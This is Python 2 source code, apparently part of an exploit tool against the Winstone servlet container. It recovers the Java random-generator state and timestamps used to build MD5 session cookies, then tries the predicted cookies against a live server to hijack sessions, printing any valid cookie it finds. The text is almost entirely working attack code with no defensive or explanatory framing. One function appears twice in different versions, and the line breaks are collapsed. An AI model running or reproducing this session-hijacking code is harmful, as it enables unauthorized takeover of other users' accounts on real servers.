def hijackSession(url,IPAddr,serverPort,sessionsFileName,success_str): f = open(sessionsFileName,"r") while True: line = f.readline().replace("\n","") if line == "": break (cookieName,timeMillisMin,timeMillisMax,PRNGseed,sessionCnt) = line.split(",") timeMillisMin = int(timeMillisMin) timeMillisMax = int(timeMillisMax) PRNGseed = int(PRNGseed) sessionCnt = int(sessionCnt) seek = 1 for tryMillis in range(timeMillisMin,timeMillisMax): if seek > sessionCnt: break g = JavaLCGMimic(0) g.forceSeed(PRNGseed) for i in range(seek): PRNGout = g.nextLong() md5dig = hashlib.md5() md5dig.update("Winstone_"+IPAddr+"_"+serverPort+"_"+str(tryMillis)+str(PRNGout)) cookieToTry = md5dig.hexdigest() if isCookieValid(url,cookieName+"="+cookieToTry,success_str): print "[!!!] Found valid cookie:",cookieName+"="+cookieToTry seek += 1
def recoverPRNGStateWorker(cookie,timeMillisEstimate,workQueue,IPAddr,serverPort,seedValue): global PRNGseekMax global timeMillisDelay while True: if seedValue.value != 0: return 0 (PRNGMillisMin,PRNGMillisMax,PRNGseek) = workQueue.get(block=False) workQueue.put((PRNGMillisMin,PRNGMillisMax,PRNGseek+1)) if PRNGseek > PRNGseekMax: return -1 for PRNGMillis in range(PRNGMillisMin,PRNGMillisMax): #if seedValue.value != 0: #return 0 g = JavaLCGMimic(PRNGMillis) PRNGout = -1 for s in range(PRNGseek): PRNGout = g.nextLong() for timeMillis in range(timeMillisEstimate-timeMillisDelay,timeMillisEstimate+1000): md5dig = hashlib.md5() md5dig.update("Winstone_"+IPAddr+"_"+serverPort+"_"+str(timeMillis)+str(PRNGout)) if md5dig.hexdigest() == cookie: seedValue.value = g.seed return 0
def recoverPRNGStateWorker(cookie,timeMillisEstimate,workQueue,IPAddr,serverPort,seedValue): global PRNGseekMax global timeMillisDelay while True: if seedValue.value != 0: return 0 (PRNGMillisMin,PRNGMillisMax,PRNGseek) = (None,None,None) try: (PRNGMillisMin,PRNGMillisMax,PRNGseek) = workQueue.get(timeout=1) except TQ.Empty: print "[!] Queue is EMPTY" return if PRNGMillisMin == None: print "[!] Cannot read from queue" return workQueue.put((PRNGMillisMin,PRNGMillisMax,PRNGseek+1)) if PRNGseek > PRNGseekMax: return for PRNGMillis in range(PRNGMillisMin,PRNGMillisMax): g = JavaLCGMimic(PRNGMillis) PRNGout = -1 for s in range(PRNGseek): PRNGout = g.nextLong() for timeMillis in range(timeMillisEstimate-timeMillisDelay,timeMillisEstimate+1000): md5dig = hashlib.md5() md5dig.update("Winstone_"+IPAddr+"_"+serverPort+"_"+str(timeMillis)+str(PRNGout)) if md5dig.hexdigest() == cookie: print "[*] Found PRNGMillis =",PRNGMillis print "[*] Found timeMillis =",timeMillis seedValue.value = g.seed return 0
def syncMillisAndPRNG(url,PRNGseed,IPAddr,serverPort,timezone): global CookieName global PRNGseekMax global timeMillisDelay t = givemecookie(url) if t == None: return cookie = t[0].split('=')[-1] st = time.strptime(t[-1], '%a, %d %b %Y %H:%M:%S %Z') dt = datetime.fromtimestamp(time.mktime(st)) dt = dt.replace(tzinfo=pytz.utc).astimezone(pytz.timezone(timezone)) timeSecs = int(time.mktime(dt.timetuple())) PRNGseek = 1 while True: if PRNGseek > PRNGseekMax: break g = JavaLCGMimic(0) g.forceSeed(PRNGseed) PRNGout = -1 for s in range(PRNGseek): PRNGout = g.nextLong() for timeMillis in range((timeSecs*1000)-timeMillisDelay,(timeSecs*1000)+1000): md5dig = hashlib.md5() md5dig.update("Winstone_"+IPAddr+"_"+serverPort+"_"+str(timeMillis)+str(PRNGout)) if md5dig.hexdigest() == cookie: print "[.] Parameters found:","timeMillis =",timeMillis,"Seek =",PRNGseek return (timeMillis,g.seed,PRNGseek) PRNGseek += 1